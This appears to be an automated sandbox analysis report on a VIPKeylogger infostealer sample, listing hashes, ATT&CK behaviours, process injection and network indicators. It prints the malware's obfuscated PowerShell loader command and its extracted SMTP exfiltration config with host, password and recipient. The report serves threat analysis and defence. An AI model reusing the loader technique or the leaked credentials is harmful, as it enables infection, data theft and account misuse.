Analysis
-
max time kernel
144s -
max time network
148s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
10-12-2024 15:26
Static task
static1
Behavioral task
behavioral1
Sample
ST07933.exe
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
ST07933.exe
Resource
win10v2004-20241007-en
General
-
Target
ST07933.exe
-
Size
820KB
-
MD5
d9c24eb3137fb3e1f939625d3076bb0f
-
SHA1
9d06b465b4e137dccc09aa583fd928bbcf2275aa
-
SHA256
02184b32f1b3e76b78acf7e889f3f581ef65696df1f64efb9bfe3b2d2ccabfd6
-
SHA512
f1d6e69a72deb762416c0954faa05196debc9b6b53ab9a38621dbeb0175dd907ce4758b0aea6f78501b5b9a6c8307c50a10fe7c6e4af72415c9a573d08baf057
-
SSDEEP
24576:wTkQIwLXEADfmo/SbKdsyjlR4MsfZV+ER/r:qvTDf6bKdsalRpsfZV+q/r
Malware Config
Extracted
vipkeylogger
Protocol: smtp- Host:
smtp.ionos.es - Port:
587 - Username:
[email protected] - Password:
JA-*2020antonio - Email To:
[email protected]
Signatures
-
VIPKeylogger
VIPKeylogger is a keylogger and infostealer written in C# and it resembles SnakeKeylogger that was found in 2020.
-
Vipkeylogger family
-
Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 msiexec.exe Key opened \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 msiexec.exe Key opened \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 msiexec.exe -
Blocklisted process makes network request 8 IoCs
flow pid Process 36 4288 msiexec.exe 38 4288 msiexec.exe 40 4288 msiexec.exe 42 4288 msiexec.exe 44 4288 msiexec.exe 49 4288 msiexec.exe 51 4288 msiexec.exe 55 4288 msiexec.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
flow ioc 35 drive.google.com 36 drive.google.com -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 48 checkip.dyndns.org -
Drops file in System32 directory 1 IoCs
description ioc Process File opened for modification C:\Windows\SysWOW64\telectrograph\assimilationer.Qua ST07933.exe -
Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs
pid Process 4288 msiexec.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
pid Process 3200 powershell.exe 4288 msiexec.exe -
Drops file in Program Files directory 1 IoCs
description ioc Process File opened for modification C:\Program Files (x86)\Common Files\intercepter.mos ST07933.exe -
pid Process 3200 powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 3 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language msiexec.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language ST07933.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe -
Suspicious behavior: EnumeratesProcesses 9 IoCs
pid Process 3200 powershell.exe 3200 powershell.exe 3200 powershell.exe 3200 powershell.exe 3200 powershell.exe 3200 powershell.exe 3200 powershell.exe 4288 msiexec.exe 4288 msiexec.exe -
Suspicious behavior: MapViewOfSection 1 IoCs
pid Process 3200 powershell.exe -
Suspicious use of AdjustPrivilegeToken 23 IoCs
description pid Process Token: SeDebugPrivilege 3200 powershell.exe Token: SeIncreaseQuotaPrivilege 3200 powershell.exe Token: SeSecurityPrivilege 3200 powershell.exe Token: SeTakeOwnershipPrivilege 3200 powershell.exe Token: SeLoadDriverPrivilege 3200 powershell.exe Token: SeSystemProfilePrivilege 3200 powershell.exe Token: SeSystemtimePrivilege 3200 powershell.exe Token: SeProfSingleProcessPrivilege 3200 powershell.exe Token: SeIncBasePriorityPrivilege 3200 powershell.exe Token: SeCreatePagefilePrivilege 3200 powershell.exe Token: SeBackupPrivilege 3200 powershell.exe Token: SeRestorePrivilege 3200 powershell.exe Token: SeShutdownPrivilege 3200 powershell.exe Token: SeDebugPrivilege 3200 powershell.exe Token: SeSystemEnvironmentPrivilege 3200 powershell.exe Token: SeRemoteShutdownPrivilege 3200 powershell.exe Token: SeUndockPrivilege 3200 powershell.exe Token: SeManageVolumePrivilege 3200 powershell.exe Token: 33 3200 powershell.exe Token: 34 3200 powershell.exe Token: 35 3200 powershell.exe Token: 36 3200 powershell.exe Token: SeDebugPrivilege 4288 msiexec.exe -
Suspicious use of WriteProcessMemory 7 IoCs
description pid Process procid_target PID 1212 wrote to memory of 3200 1212 ST07933.exe 86 PID 1212 wrote to memory of 3200 1212 ST07933.exe 86 PID 1212 wrote to memory of 3200 1212 ST07933.exe 86 PID 3200 wrote to memory of 4288 3200 powershell.exe 93 PID 3200 wrote to memory of 4288 3200 powershell.exe 93 PID 3200 wrote to memory of 4288 3200 powershell.exe 93 PID 3200 wrote to memory of 4288 3200 powershell.exe 93 -
outlook_office_path 1 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 msiexec.exe -
outlook_win_path 1 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 msiexec.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\ST07933.exe"C:\Users\Admin\AppData\Local\Temp\ST07933.exe"1⤵
- Drops file in System32 directory
- Drops file in Program Files directory
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1212 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" -windowstyle minimized "$Dudleyite119=Get-Content -Raw 'C:\Users\Admin\AppData\Local\Temp\depersonaliseredes\Faldgruberne\Proterandrous.Dis';$Interlaminating=$Dudleyite119.SubString(7465,3);.$Interlaminating($Dudleyite119)"2⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3200 -
C:\Windows\SysWOW64\msiexec.exe"C:\Windows\SysWOW64\msiexec.exe"3⤵
- Accesses Microsoft Outlook profiles
- Blocklisted process makes network request
- Suspicious use of NtCreateThreadExHideFromDebugger
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- outlook_office_path
- outlook_win_path
PID:4288
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
71KB
MD592abdd2b532425d14efa291e5d5780b3
SHA1489bac8d9c5f423a1f92f7ad618b5c2b288fdd69
SHA25686aecbcc718243267fef6fa993e76cc33e49b708e68353b982cc4af30ce7876b
SHA512b8b6b3a16eb40cb6a778e7e77c289aebdb685c170d173ddf59034a6546b7dbc6e4216ff92ee36f2eeb84ab6f3becd838732689f9ce54db94858fb754a4276e61
-
Filesize
293KB
MD597558276c365fbe801720b97d8f39edb
SHA1bc27ec1aaf395a74aa8d7fb85a8e52f86b23c7fd
SHA2567af8da81126c1341ca58e7010715cc4bc8b18ff206a3b3d4a4a5f8a72fa9e899
SHA5127ac1d867e0fe4b25781ea8c70c162a042684c27e6a50e3a3dabfa02513109109211bc3f78854d9604ccd661c32549519e6950f1982b4951ef51dc363f8e49e43